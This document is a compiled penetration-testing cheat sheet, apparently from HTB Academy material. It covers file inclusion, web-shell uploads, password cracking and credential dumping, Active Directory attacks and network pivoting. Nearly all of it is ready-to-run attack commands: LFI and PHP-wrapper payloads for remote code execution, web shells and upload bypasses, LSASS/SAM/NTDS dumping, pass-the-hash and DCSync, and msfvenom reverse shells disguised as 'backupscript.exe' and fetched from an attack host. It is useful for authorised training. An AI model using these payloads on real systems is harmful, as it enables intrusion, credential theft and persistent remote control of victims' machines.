/index.php?language=/../../../etc/passwd LFI with name prefix
/index.php?language=./languages/../../../../etc/passwd LFI with approved path
LFI Bypasses
/index.php?language=....//....//....//....//etc/passwd Bypass basic path traversal filter
/index.php?language=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64 Bypass filters with URL encoding
/index.php?language=non_existing_directory/../../../etc/passwd/./././.[./ REPEATED ~2048 times] Bypass appended extension with path truncation (obsolete)
/index.php?language=../../../../etc/passwd%00 Bypass appended extension with null byte (obsolete)
/index.php?language=php://filter/read=convert.base64-encode/resource=config Read PHP with base64 filter

Remote Code Execution

Command Description
PHP Wrappers
/index.php?language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=id RCE with data wrapper
curl -s -X POST --data '\<?php system($_GET["cmd"]); ?>' "http://\<SERVER_IP>:\<PORT>/index.php?language=php://input&cmd=id" RCE with input wrapper
curl -s "http://\<SERVER_IP>:\<PORT>/index.php?language=expect://id" RCE with expect wrapper
RFI
echo '\<?php system($_GET["cmd"]); ?>' > shell.php && python3 -m http.server \<LISTENING_PORT> Host web shell
/index.php?language=http://\<OUR_IP>:\<LISTENING_PORT>/shell.php&cmd=id Include remote PHP web shell
LFI + Upload
echo 'GIF8\<?php system($_GET["cmd"]); ?>' > shell.gif Create malicious image
/index.php?language=./profile_images/shell.gif&cmd=id RCE with malicious uploaded image
echo '\<?php system($_GET["cmd"]); ?>' > shell.php && zip shell.jpg shell.php Create malicious zip archive 'as jpg'
/index.php?language=zip://shell.zip%23shell.php&cmd=id RCE with malicious uploaded zip
php --define phar.readonly=0 shell.php && mv shell.phar shell.jpg Create malicious phar 'as jpg'
/index.php?language=phar://./profile_images/shell.jpg%2Fshell.txt&cmd=id RCE with malicious uploaded phar
Log Poisoning
/index.php?language=/var/lib/php/sessions/sess_nhhv8i0o6ua4g88bkdl9u1fdsd Read PHP session parameters
/index.php?language=%3C%3Fphp%20system%28%24_GET%5B%22cmd%22%5D%29%3B%3F%3E Poison PHP session with web shell
/index.php?language=/var/lib/php/sessions/sess_nhhv8i0o6ua4g88bkdl9u1fdsd&cmd=id RCE through poisoned PHP session
curl -s "http://\<SERVER_IP>:\<PORT>/index.php" -A '\<?php system($_GET["cmd"]); ?>' Poison server log
/index.php?language=/var/log/apache2/access.log&cmd=id RCE through poisoned PHP session

Misc

Command Description
ffuf -w /opt/useful/SecLists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u 'http://\<SERVER_IP>:\<PORT>/index.php?FUZZ=value' -fs 2287 Fuzz page parameters
ffuf -w /opt/useful/SecLists/Fuzzing/LFI/LFI-Jhaddix.txt:FUZZ -u 'http://\<SERVER_IP>:\<PORT>/index.php?language=FUZZ' -fs 2287 Fuzz LFI payloads
ffuf -w /opt/useful/SecLists/Discovery/Web-Content/default-web-root-directory-linux.txt:FUZZ -u 'http://\<SERVER_IP>:\<PORT>/index.php?language=../../../../FUZZ/index.php' -fs 2287 Fuzz webroot path
ffuf -w ./LFI-WordList-Linux:FUZZ -u 'http://\<SERVER_IP>:\<PORT>/index.php?language=../../../../FUZZ' -fs 2287 Fuzz server configurations
LFI Wordlists
LFI-Jhaddix.txt

File Inclusion Functions

Function Read Content Execute Remote URL
PHP
include()/include_once()
require()/require_once()
file_get_contents()
fopen()/file()
NodeJS
fs.readFile()
fs.sendFile()
res.render()
Java
include
import
.NET
@Html.Partial()
@Html.RemotePartial()
Response.WriteFile()
include

File Upload

Web Shells

Web Shell Description
\<?php file_get_contents('/etc/passwd'); ?\> Basic PHP File Read
\<?php system('hostname'); ?\> Basic PHP Command Execution
\<?php system($_REQUEST['cmd']); ?\> Basic PHP Web Shell
\<% eval request('cmd') %> Basic ASP Web Shell
msfvenom -p php/reverse_php LHOST=OUR_IP LPORT=OUR_PORT -f raw > reverse.php Generate PHP reverse shell
PHP Web Shell PHP Web Shell
PHP Reverse Shell PHP Reverse Shell
Web/Reverse Shells List of Web Shells and Reverse Shells

Bypasses

Command Description
Client-Side Bypass
[CTRL+SHIFT+C] Toggle Page Inspector
Blacklist Bypass
shell.phtml Uncommon Extension
shell.pHp Case Manipulation
PHP Extensions List of PHP Extensions
ASP Extensions List of ASP Extensions
Web Extensions List of Web Extensions
Whitelist Bypass
shell.jpg.php Double Extension
shell.php.jpg Reverse Double Extension
%20, %0a, %00, %0d0a, /, .\, ., … Character Injection - Before/After Extension
Content/Type Bypass
Web Content-Types List of Web Content-Types
Content-Types List of All Content-Types
File Signatures List of File Signatures/Magic Bytes

Limited Uploads

Potential Attack File Types
XSS HTML, JS, SVG, GIF
XXE/SSRF XML, SVG, PDF, PPT, DOC
DoS ZIP, JPG, PNG

Password Attacks Cheatsheet

Password attacks are a pervasive threat in the digital landscape, often serving as the primary vector for cybercriminals to breach secure systems. In recent years, compromised credentials have been responsible for a significant majority of data breaches, with 81% of such incidents in 2020 attributed to weak or stolen passwords[1][2]. These attacks exploit vulnerabilities in user authentication, leveraging techniques such as phishing, man-in-the-middle attacks, brute force attempts, and credential stuffing to gain unauthorized access to sensitive information[1][2]. As technology advances, so too do the methods employed by hackers, making it increasingly important for individuals and organizations to implement robust security measures, including strong password policies and multi-factor authentication, to protect against these ever-evolving threats[5].

Connecting to Target

Command Description
xfreerdp /v: /u:htb-student /p:HTB_@cademy_stdnt! CLI-based tool used to connect to a Windows target using the Remote Desktop Protocol.
evil-winrm -i -u user -p password Uses Evil-WinRM to establish a Powershell session with a target.
ssh user@ Uses SSH to connect to a target using a specified user.
smbclient -U user \\\SHARENAME Uses smbclient to connect to an SMB share using a specified user.
python3 smbserver.py -smb2support CompData /home//Documents/ Uses smbserver.py to create a share on a linux-based attack host. Can be useful when needing to transfer files from a target to an attack host.

Password Mutations

Command Description
cewl https://www.inlanefreight.com -d 4 -m 6 --lowercase -w inlane.wordlist Uses cewl to generate a wordlist based on keywords present on a website.
hashcat --force password.list -r custom.rule --stdout > mut_password.list Uses Hashcat to generate a rule-based word list.
./username-anarchy -i /path/to/listoffirstandlastnames.txt Users username-anarchy tool in conjunction with a pre-made list of first and last names to generate a list of potential username.
curl -s https://fileinfo.com/filetypes/compressed html2text

Remote Password Attacks

Command Description
crackmapexec winrm -u user.list -p password.list Uses CrackMapExec over WinRM to attempt to brute force user names and passwords specified hosted on a target.
crackmapexec smb -u "user" -p "password" --shares Uses CrackMapExec to enumerate smb shares on a target using a specified set of credentials.
hydra -L user.list -P password.list :// Uses Hydra in conjunction with a user list and password list to attempt to crack a password over the specified service.
hydra -l username -P password.list :// Uses Hydra in conjunction with a username and password list to attempt to crack a password over the specified service.
hydra -L user.list -p password :// Uses Hydra in conjunction with a user list and password to attempt to crack a password over the specified service.
hydra -C ssh:// Uses Hydra in conjunction with a list of credentials to attempt to login to a target over the specified service. This can be used to attempt a credential stuffing attack.
crackmapexec smb --local-auth -u -p --sam Uses CrackMapExec in conjunction with admin credentials to dump password hashes stored in SAM, over the network.
crackmapexec smb --local-auth -u -p --lsa Uses CrackMapExec in conjunction with admin credentials to dump lsa secrets, over the network. It is possible to get clear-text credentials this way.
crackmapexec smb -u -p --ntds Uses CrackMapExec in conjunction with admin credentials to dump hashes from the ntds file over a network.
evil-winrm -i -u Administrator -H "" Uses Evil-WinRM to establish a Powershell session with a Windows target using a user and password hash. This is one type of Pass-The-Hash attack.

Windows Local Password Attacks

Command Description
tasklist /svc A command-line-based utility in Windows used to list running processes.
findstr /SIM /C:"password" .txt .ini .cfg .config .xml .git .ps1 .yml Uses Windows command-line based utility findstr to search for the string "password" in many different file type.
Get-Process lsass A Powershell cmdlet is used to display process information. Using this with the LSASS process can be helpful when attempting to dump LSASS process memory from the command line.
rundll32 C:\windows\system32\comsvcs.dll, MiniDump 672 C:\lsass.dmp full Uses rundll32 in Windows to create a LSASS memory dump file. This file can then be transferred to an attack box to extract credentials.
pypykatz lsa minidump /path/to/lsassdumpfile Uses Pypykatz to parse and attempt to extract credentials & password hashes from an LSASS process memory dump file.
reg.exe save hklm\sam C:\sam.save Uses reg.exe in Windows to save a copy of a registry hive at a specified location on the file system. It can be used to make copies of any registry hive (i.e., hklm\sam, hklm\security, hklm\system).
move sam.save \\NameofFileShare Uses move in Windows to transfer a file to a specified file share over the network.
python3 secretsdump.py -sam sam.save -security security.save -system system.save LOCAL Uses Secretsdump.py to dump password hashes from the SAM database.
vssadmin CREATE SHADOW /For=C: Uses Windows command line based tool vssadmin to create a volume shadow copy for C:. This can be used to make a copy of NTDS.dit safely.
cmd.exe /c copy \?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\NTDS.dit c:\NTDS\NTDS.dit Uses Windows command line based tool copy to create a copy of NTDS.dit for a volume shadow copy of C:.

Linux Local Password Attacks

Command Description
for l in $(echo ".conf .config .cnf");do echo -e "\nFile extension: " $l; find / -name *$l 2>/dev/null grep -v "lib
for i in $(find / -name *.cnf 2>/dev/null grep -v "doc
for l in $(echo ".sql .db .db .db");do echo -e "\nDB File extension: " $l; find / -name *$l 2>/dev/null grep -v "doc
find /home/ -type f -name ".txt" -o ! -name "." Uses Linux-based find command to search for text files.
for l in $(echo ".py .pyc .pl .go .jar .c .sh");do echo -e "\nFile extension: " $l; find / -name *$l 2>/dev/null grep -v "doc
for ext in $(echo ".xls .xls .xltx .csv .od .doc .doc .pdf .pot .pot .pp");do echo -e "\nFile extension: " $ext; find / -name $ext 2>/dev/null grep -v "lib
cat /etc/crontab Uses Linux-based cat command to view the contents of crontab in search for credentials.
ls -la /etc/cron.*/ Uses Linux-based ls -la command to list all files that start with cron contained in the etc directory.
grep -rnw "PRIVATE KEY" /* 2>/dev/null grep ":1"
grep -rnw "PRIVATE KEY" /home/* 2>/dev/null grep ":1"
grep -rnw "ssh-rsa" /home/* 2>/dev/null grep ":1"
tail -n5 /home//.bash Uses Linux-based tail command to search the through bash history files and output the last 5 lines.
python3 mimipenguin.py Runs Mimipenguin.py using python3.
bash mimipenguin.sh Runs Mimipenguin.sh using bash.
python2.7 lazagne.py all Runs Lazagne.py with all modules using python2.7
ls -l .mozilla/firefox/ grep default
cat .mozilla/firefox/1bplpd86.default-release/logins.json jq .
python3.9 firefox_decrypt.py Runs Firefox_decrypt.py to decrypt any encrypted credentials stored by Firefox. Program will run using python3.9.
python3 lazagne.py browsers Runs Lazagne.py browsers module using Python 3.

Cracking Passwords

Command Description
hashcat -m 1000 dumpedhashes.txt /usr/share/wordlists/rockyou.txt Uses Hashcat to crack NTLM hashes using a specified wordlist.
hashcat -m 1000 64f12cddaa88057e06a81b54e73b949b /usr/share/wordlists/rockyou.txt --show Uses Hashcat to attempt to crack a single NTLM hash and display the results in the terminal output.
unshadow /tmp/passwd.bak /tmp/shadow.bak > /tmp/unshadowed.hashes Uses unshadow to combine data from passwd.bak and shadow.bk into one single file to prepare for cracking.
hashcat -m 1800 -a 0 /tmp/unshadowed.hashes rockyou.txt -o /tmp/unshadowed.cracked Uses Hashcat in conjunction with a wordlist to crack the unshadowed hashes and outputs the cracked hashes to a file called unshadowed.cracked.
hashcat -m 500 -a 0 md5-hashes.list rockyou.txt Uses Hashcat in conjunction with a word list to crack the md5 hashes in the md5-hashes.list file.
hashcat -m 22100 backup.hash /opt/useful/seclists/Passwords/Leaked-Databases/rockyou.txt -o backup.cracked Uses Hashcat to crack the extracted BitLocker hashes using a wordlist and outputs the cracked hashes into a file called backup.cracked.
ssh2john.pl SSH.private > ssh.hash Runs Ssh2john.pl script to generate hashes for the SSH keys in the SSH.private file, then redirects the hashes to a file called ssh.hash.
john ssh.hash --show Uses John to attempt to crack the hashes in the ssh.hash file, then outputs the results in the terminal.
office2john.py Protected.docx > protected-docx.hash Runs Office2john.py against a protected .docx file and converts it to a hash stored in a file called protected-docx.hash.
john --wordlist=rockyou.txt protected-docx.hash Uses John in conjunction with the wordlist rockyou.txt to crack the hash protected-docx.hash.
pdf2john.pl PDF.pdf > pdf.hash Runs Pdf2john.pl script to convert a pdf file to a pdf has to be cracked.
john --wordlist=rockyou.txt pdf.hash Runs John in conjunction with a wordlist to crack a pdf hash.
zip2john ZIP.zip > zip.hash Runs Zip2john against a zip file to generate a hash, then adds that hash to a file called zip.hash.
john --wordlist=rockyou.txt zip.hash Uses John in conjunction with a wordlist to crack the hashes contained in zip.hash.
bitlocker2john -i Backup.vhd > backup.hashes Uses Bitlocker2john script to extract hashes from a VHD file and directs the output to a file called backup.hashes.
file GZIP.gzip Uses the Linux-based file tool to gather file format information.
for i in $(cat rockyou.txt);do openssl enc -aes-256-cbc -d -in GZIP.gzip -k $i 2>/dev/null tar xz;done

Hydra

Command Description
hydra -h hydra help
hydra -C wordlist.txt SERVER_IP -s PORT http-get / Basic Auth Brute Force - Combined Wordlist
hydra -L wordlist.txt -P wordlist.txt -u -f SERVER_IP -s PORT http-get / Basic Auth Brute Force - User/Pass Wordlists
hydra -l admin -P wordlist.txt -f SERVER_IP -s PORT http-post-form "/login.php:username=^USER^&password=^PASS^:F=<form name='login'" Login Form Brute Force - Static User, Pass Wordlist
hydra -L bill.txt -P william.txt -u -f ssh://SERVER_IP:PORT -t 4 SSH Brute Force - User/Pass Wordlists
hydra -l m.gates -P rockyou-10.txt ftp://127.0.0.1 FTP Brute Force - Static User, Pass Wordlist

Wordlists

Command Description
/opt/useful/SecLists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt Default Passwords Wordlist
/opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt Common Passwords Wordlist
/opt/useful/SecLists/Usernames/Names/names.txt Common Names Wordlist

Misc

Command Description
cupp -i Creating Custom Password Wordlist
sed -ri '/^.{,7}$/d' william.txt Remove Passwords Shorter Than 8
sed -ri '/[!-/:-@[-`{-~]+/!d' william.txt Remove Passwords With No Special Chars
sed -ri '/[0-9]+/!d' william.txt Remove Passwords With No Numbers
./username-anarchy Bill Gates > bill.txt Generate Usernames List
ssh b.gates@SERVER_IP -p PORT SSH to Server
ftp 127.0.0.1 FTP to Server
su - user Switch to User

Active Directory Cheatsheet

Penetration testing and network exploitation involve a wide array of tools and techniques designed to assess and improve the security of computer systems. These tools help identify vulnerabilities, validate user credentials, and simulate attacks to test defenses. From enumerating network shares and users to exploiting weaknesses in authentication protocols like Kerberos, each tool serves a specific purpose in the broader strategy of ethical hacking. This collection of commands and tools provides a comprehensive overview of the methods used to enumerate systems, manage credentials, gain remote access, and escalate privileges, ultimately aiding in the detection and mitigation of security threats. Below are organized tables detailing these tools and their applications.

The process should go as follows:

1- get users (userenum, kerbrute)

2- get passwords/hashes (ASRep, Password Spraying, NTLM Stealing, Cracking or relaying) to connect or pass the hash or overpass the hash (if no NTLM auth and GUI) or perform DCSync

3- get service account password/hashes/ticket (kerberoasting(TGSRep), silver ticket) to pass the hash or pass the ticket

4- get DA password/hashes (mimikatz, golden ticket) to connect or have full persistence with golden ticket or shadow copies

more commands on: WADComs

Enumeration Tools

Tool/Command Description
enum4linux $IP Enumerate SMB shares and users on the target IP.
crackmapexec smb --pass-pol $IP Check password policy on the target SMB server.
crackmapexec smb $IP --shares List available SMB shares on the target IP.
crackmapexec smb $IP -M spider_plus Run Spider Plus module on the target SMB server.
smbmap -u invalid -H $IP Attempt to connect to SMB shares with an invalid user.
ldapsearch -H ldap://$IP -x -b "dc=domain,dc=local" Perform LDAP enumeration on the target domain.

Username Validation and Password Spraying

Tool/Command Description
kerbrute_linux_amd64 userenum -d domain.local --dc $IP users.txt Enumerate valid usernames in the domain.
kerbrute_linux_amd64 passwordspray -d domain.local --dc $IP users.txt 'S3cret' Spray a common password across the enumerated usernames.
kerbrute_linux_amd64 bruteforce -d domain.local --dc $IP creds.txt Perform brute-force attacks using a list of credentials.
crackmapexec smb $IP -u users.txt -p 'S3cret' Attempt to login to SMB with a list of users and a single password.
crackmapexec smb $IP -u users.txt -p passwords.txt Attempt to login to SMB with a list of users and multiple passwords.

LLMNR/NTB-NS Poisoning Tools

Tool/Command Description
crackmapexec smb 10.10.10.10 -u username -p password -M scuffy -o NAME=filename SERVER=IP_RESPONDER Create a malicious SCF file to capture NTLM hashes via SMB.
crackmapexec smb 10.10.10.10 -u username -p password -M slinky -o NAME=filename SERVER=IP_RESPONDER Create a malicious LNK file to capture NTLM hashes via SMB.
responder -I tun0 -wv Run Responder to capture NTLM hashes by poisoning LLMNR and NTB-NS requests.
\\\test Trigger authentication by accessing a UNC path, relaying the NTLM hash to a target machine.

Tools for Use with Credentials

Tool/Command Description
crackmapexec ldap $IP -u user -p P4ssword --password-not-required --admin-count --users --groups Enumerate LDAP with credentials, focusing on admin users and groups.
enum4linux -u user -p P4ssword -a $IP Perform detailed SMB enumeration with credentials.
crackmapexec smb $IP -u user -p P4ssword Connect to SMB server with credentials.
crackmapexec smb $IP -u user -p P4ssword --shares List SMB shares accessible with credentials.
crackmapexec smb $IP -u user -p P4ssword -M spider_plus Run Spider Plus module with credentials.

Kerberos and Ticket Management

Tool/Command Description
impacket-getTGT domain.local/user:P4ssword Obtain a Kerberos ticket for the user.
export KRB5CCNAME=ksimpson.ccache Set environment variable for the Kerberos ticket cache.
klist List cached Kerberos tickets.
impacket-GetNPUsers -dc-ip $IP -no-pass -usersfile users.txt domain.local/ Perform AS-REP Roasting attack.
impacket-GetUserSPNs -request -dc-ip $IP domain.local/user Perform Kerberoasting attack.

Remote Access and Execution

Tool/Command Description
impacket-psexec domain.local/user:P4ssword@$IP Execute commands remotely via SMB.
crackmapexec winrm $IP -u user -p P4ssword Connect to WinRM with credentials.
evil-winrm -i $IP -u user -p P4ssword Connect to WinRM with credentials using Evil-WinRM.
crackmapexec rdp $IP -u user -p P4ssword Connect to RDP with credentials.
rdesktop -u user -p P4ssword -d domain.local $IP -r disk:tools=/home/kali/tools -r clipboard:PRIMARYCLIPBOARD Connect to RDP with credentials and mount tools.

Password Dumping and Hash Management

Tool/Command Description
impacket-secretsdump -just-dc domain.local/user:P4ssword@$IP Dump NTDS hashes from the domain controller.
impacket-secretsdump -sam SAM -system SYSTEM -security SECURITY LOCAL Dump local SAM, SYSTEM, and SECURITY files.
crackmapexec smb $IP -u user -p P4ssword --ntds Dump NTDS hashes via SMB.

Bloodhound and Network Visualization

Tool/Command Description
bloodhound-python -d domain.local -u user -p P4ssword -ns $IP -c all Collect data for Bloodhound network visualization.

Pass-the-Hash Attacks

Tool/Command Description
crackmapexec smb $IP -u administrator -H 'LMHASH:NTHASH' --local-auth Perform SMB login using pass-the-hash.
impacket-psexec -hashes aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6 administrator@$IP Execute commands via SMB using pass-the-hash.
crackmapexec winrm $IP -u administrator -H 'LMHASH:NTHASH' --local-auth Connect to WinRM using pass-the-hash.
evil-winrm -i $IP -u administrator -H 32693b11e6aa90eb43d32c72a07ceea6 Connect to WinRM using pass-the-hash with Evil-WinRM.

Silver Ticket and Other Advanced Attacks

Tool/Command Description
impacket-getPac -targetUser administrator domain.local/user:P4ssword Obtain a PAC for creating a Silver Ticket.
impacket-ticketer -spn MSSQLSvc/dc1.domain.local -user-id 500 Administrator -nthash b999a16500b87d17ec7f2e2a68778f05 -domain-sid S-1-5-21-2743207045-1827831105-2542523200 -domain domain.local Create a Silver Ticket for a service.
impacket-mssqlclient -k dc1.domain.local Connect to MSSQL using a Silver Ticket.

Local Privilege Escalation and Shell Management

Tool/Command Description
.\mimikatz.exe "privilege::debug" "token::elevate" "log hashes.txt" "sekurlsa::tickets" "sekurlsa::logonpasswords" "lsadump::sam" "exit" Elevate privileges, log tickets, and dump SAM hashes using Mimikatz.
.\mimikatz.exe "lsadump::dcsync /user:inlanefreight\krbtgt" "exit" Perform DCSync attack to dump domain hashes.
.\mimikatz.exe "kerberos::list /export" "exit" List and export Kerberos tickets.
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 Enable WDigest for password capture.

Kerberos Ticket Management

Tool/Command Description
.\mimikatz.exe "privilege::debug" "kerberos::ptt 0-2-0-40e10000-Administrator@krbtgt-HACKER.TESTLAB.kirbi" "exit" Pass-the-ticket using a .kirbi file.

Bloodhound and Network Visualization

Tool/Command Description
.\SharpHound.exe -c all Collect data for Bloodhound network visualization.

Additional Tools and Commands

Tool/Command Description
net rpc password target_user -U pwned_user -S $IP Change a user's password using RPC.
sudo ntpdate $IP Synchronize time with the target server.

Pivot Network Cheatsheet

Pivoting and tunneling are crucial techniques used in network security testing and penetration testing to access and navigate through internal networks that are not directly reachable from the outside. Pivoting involves using a compromised host as a pivot point to move laterally within a network, bypassing segmentation and accessing previously isolated systems. This method is essential for expanding the attack surface and discovering new targets within a network. Tunneling, on the other hand, is a subset of pivoting that encapsulates network traffic within another protocol, allowing it to traverse restricted networks undetected. Common tunneling methods include SSH tunneling, which uses encrypted connections to relay traffic, and SOCKS proxies, which route traffic through a compromised host. Both techniques are vital for red team engagements and penetration tests, enabling testers to simulate real-world attacks and assess network vulnerabilities effectively.

Tunneling and Pivoting

Command Description
ifconfig Linux-based command that displays all current network configurations of a system.
ipconfig Windows-based command that displays all system network configurations.
netstat -r Command used to display the routing table for all IPv4-based protocols.
nmap -sT -p22,3306 Nmap command used to scan a target for open ports allowing SSH or MySQL connections.
ssh -L 1234:localhost:3306 Ubuntu@ SSH comand used to create an SSH tunnel from a local machine on local port 1234 to a remote target using port 3306.
netstat -antp grep 1234
nmap -v -sV -p1234 localhost Nmap command used to scan a host through a connection that has been made on local port 1234.
ssh -L 1234:localhost:3306 8080:localhost:80 ubuntu@ SSH command that instructs the ssh client to request the SSH server forward all data via port 1234 to localhost:3306.
ssh -D 9050 ubuntu@ SSH command used to perform a dynamic port forward on port 9050 and establishes an SSH tunnel with the target. This is part of setting up a SOCKS proxy.
tail -4 /etc/proxychains.conf Linux-based command used to display the last 4 lines of /etc/proxychains.conf. Can be used to ensure socks configurations are in place.
proxychains nmap -v -sn 172.16.5.1-200 Used to send traffic generated by an Nmap scan through Proxychains and a SOCKS proxy. Scan is performed against the hosts in the specified range 172.16.5.1-200 with increased verbosity (-v) disabling ping scan (-sn).
proxychains nmap -v -Pn -sT 172.16.5.19 Used to send traffic generated by an Nmap scan through Proxychains and a SOCKS proxy. Scan is performed against 172.16.5.19 with increased verbosity (-v), disabling ping discover (-Pn), and using TCP connect scan type (-sT).
proxychains msfconsole Uses Proxychains to open Metasploit and send all generated network traffic through a SOCKS proxy.
msf6 > search rdp_scanner Metasploit search that attempts to find a module called rdp_scanner.
proxychains xfreerdp /v: /u:victor /p:pass@123 Used to connect to a target using RDP and a set of credentials using proxychains. This will send all traffic through a SOCKS proxy.
msfvenom -p windows/x64/meterpreter/reverse_https lhost= -f exe -o backupscript.exe LPORT=8080 Uses msfvenom to generate a Windows-based reverse HTTPS Meterpreter payload that will send a call back to the IP address specified following lhost= on local port 8080 (LPORT=8080). Payload will take the form of an executable file called backupscript.exe.
msf6 > use exploit/multi/handler Used to select the multi-handler exploit module in Metasploit.
scp backupscript.exe ubuntu@:~/ Uses secure copy protocol (scp) to transfer the file backupscript.exe to the specified host and places it in the Ubuntu user's home directory (:~/).
python3 -m http.server 8123 Uses Python3 to start a simple HTTP server listening on port 8123. Can be used to retrieve files from a host.
Invoke-WebRequest -Uri "http://172.16.5.129:8123/backupscript.exe" -OutFile "C:\backupscript.exe" PowerShell command used to download a file called backupscript.exe from a webserver (172.16.5.129:8123) and then save the file to location specified after -OutFile.
ssh -R :8080:0.0.0.0:80 ubuntu@ -vN SSH command used to create a reverse SSH tunnel from a target to an attack host. Traffic is forwarded on port 8080 on the attack host to port 80 on the target.
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<IPaddressofAttackHost -f elf -o backupjob LPORT=8080 Uses msfveom to generate a Linux-based Meterpreter reverse TCP payload that calls back to the IP specified after LHOST= on port 8080 (LPORT=8080). Payload takes the form of an executable elf file called backupjob.
msf6> run post/multi/gather/ping_sweep RHOSTS=172.16.5.0/23 Metasploit command that runs a ping sweep module against the specified network segment (RHOSTS=172.16.5.0/23).
for i in {1..254} ;do (ping -c 1 172.16.5.$i grep "bytes from" &) ;done
for /L %i in (1 1 254) do ping 172.16.5.%i -n 1 -w 100 find "Reply"
1..254 % {"172.16.5.$($): $(Test-Connection -count 1 -comp 172.15.5.$($) -quiet)"}
msf6 > use auxiliary/server/socks_proxy Metasploit command that selects the socks_proxy auxiliary module.
msf6 auxiliary(server/socks_proxy) > jobs Metasploit command that lists all currently running jobs.
socks4 127.0.0.1 9050 Line of text that should be added to /etc/proxychains.conf to ensure a SOCKS version 4 proxy is used in combination with proxychains on the specified IP address and port.
Socks5 127.0.0.1 1080 Line of text that should be added to /etc/proxychains.conf to ensure a SOCKS version 5 proxy is used in combination with proxychains on the specified IP address and port.
msf6 > use post/multi/manage/autoroute Metasploit command used to select the autoroute module.
meterpreter > help portfwd Meterpreter command used to display the features of the portfwd command.
meterpreter > portfwd add -l 3300 -p 3389 -r Meterpreter-based portfwd command that adds a forwarding rule to the current Meterpreter session. This rule forwards network traffic on port 3300 on the local machine to port 3389 (RDP) on the target.
xfreerdp /v:localhost:3300 /u:victor /p:pass@123 Uses xfreerdp to connect to a remote host through localhost:3300 using a set of credentials. Port forwarding rules must be in place for this to work properly.
netstat -antp Used to display all (-a) active network connections with associated process IDs. -t displays only TCP connections.-n displays only numerical addresses. -p displays process IDs associated with each displayed connection.
meterpreter > portfwd add -R -l 8081 -p 1234 -L Meterpreter-based portfwd command that adds a forwarding rule that directs traffic coming on on port 8081 to the port 1234 listening on the IP address of the Attack Host.
meterpreter > bg Meterpreter-based command used to run the selected metepreter session in the background. Similar to background a process in Linux
socat TCP4-LISTEN:8080,fork TCP4::80 Uses Socat to listen on port 8080 and then to fork when the connection is received. It will then connect to the attack host on port 80.
socat TCP4-LISTEN:8080,fork TCP4::8443 Uses Socat to listen on port 8080 and then to fork when the connection is received. Then it will connect to the target host on port 8443.
plink -D 9050 ubuntu@ Windows-based command that uses PuTTY's Plink.exe to perform SSH dynamic port forwarding and establishes an SSH tunnel with the specified target. This will allow for proxy chaining on a Windows host, similar to what is done with Proxychains on a Linux-based host.
sudo apt-get install sshuttle Uses apt-get to install the tool sshuttle.
sudo sshuttle -r ubuntu@10.129.202.64 172.16.5.0 -v Runs sshuttle, connects to the target host, and creates a route to the 172.16.5.0 network so traffic can pass from the attack host to hosts on the internal network (172.16.5.0).
sudo git clone https://github.com/klsecservices/rpivot.git Clones the rpivot project GitHub repository.
sudo apt-get install python2.7 Uses apt-get to install python2.7.
python2.7 server.py --proxy-port 9050 --server-port 9999 --server-ip 0.0.0.0 Used to run the rpivot server (server.py) on proxy port 9050, server port 9999 and listening on any IP address (0.0.0.0).
scp -r rpivot ubuntu@ Uses secure copy protocol to transfer an entire directory and all of its contents to a specified target.
python2.7 client.py --server-ip 10.10.14.18 --server-port 9999 Used to run the rpivot client (client.py) to connect to the specified rpivot server on the appropriate port.
proxychains firefox-esr :80 Opens firefox with Proxychains and sends the web request through a SOCKS proxy server to the specified destination web server.
python client.py --server-ip --server-port 8080 --ntlm-proxy-ip IPaddressofProxy> --ntlm-proxy-port 8081 --domain --username --password Use to run the rpivot client to connect to a web server that is using HTTP-Proxy with NTLM authentication.
netsh.exe interface portproxy add v4tov4 listenport=8080 listenaddress=10.129.42.198 connectport=3389 connectaddress=172.16.5.25 Windows-based command that uses netsh.exe to configure a portproxy rule called  v4tov4 that listens on port 8080 and forwards connections to the destination 172.16.5.25 on port 3389.
netsh.exe interface portproxy show v4tov4 Windows-based command used to view the configurations of a portproxy rule called v4tov4.
git clone https://github.com/iagox86/dnscat2.git Clones the dnscat2 project GitHub repository.
sudo ruby dnscat2.rb --dns host=10.10.14.18,port=53,domain=inlanefreight.local --no-cache Used to start the dnscat2.rb server running on the specified IP address, port (53) & using the domain inlanefreight.local with the no-cache option enabled.
git clone https://github.com/lukebaggett/dnscat2-powershell.git Clones the dnscat2-powershell project Github repository.
Import-Module dnscat2.ps1 PowerShell command used to import the dnscat2.ps1 tool.
Start-Dnscat2 -DNSserver 10.10.14.18 -Domain inlanefreight.local -PreSharedSecret 0ec04a91cd1e963f8c03ca499d589d21 -Exec cmd PowerShell command used to connect to a specified dnscat2 server using a IP address, domain name and preshared secret. The client will send back a shell connection to the server (-Exec cmd).
dnscat2> ? Used to list dnscat2 options.
dnscat2> window -i 1 Used to interact with an established dnscat2 session.
./chisel server -v -p 1234 --socks5 Used to start a chisel server in verbose mode listening on port 1234 using SOCKS version 5.
./chisel client -v 10.129.202.64:1234 socks Used to connect to a chisel server at the specified IP address & port using socks.
git clone https://github.com/utoni/ptunnel-ng.git Clones the ptunnel-ng project GitHub repository.
sudo ./autogen.sh Used to run the autogen.sh shell script that will build the necessary ptunnel-ng files.
sudo ./ptunnel-ng -r10.129.202.64 -R22 Used to start the ptunnel-ng server on the specified IP address (-r) and corresponding port (-R22).
sudo ./ptunnel-ng -p10.129.202.64 -l2222 -r10.129.202.64 -R22 Used to connect to a specified ptunnel-ng server through local port 2222 (-l2222).
ssh -p2222 -lubuntu 127.0.0.1 SSH command used to connect to an SSH server through a local port. This can be used to tunnel SSH traffic through an ICMP tunnel.
regsvr32.exe SocksOverRDP-Plugin.dll Windows-based command used to register the SocksOverRDP-PLugin.dll.
netstat -antb findstr 1080

Linux Privilege Escalation Cheatsheet

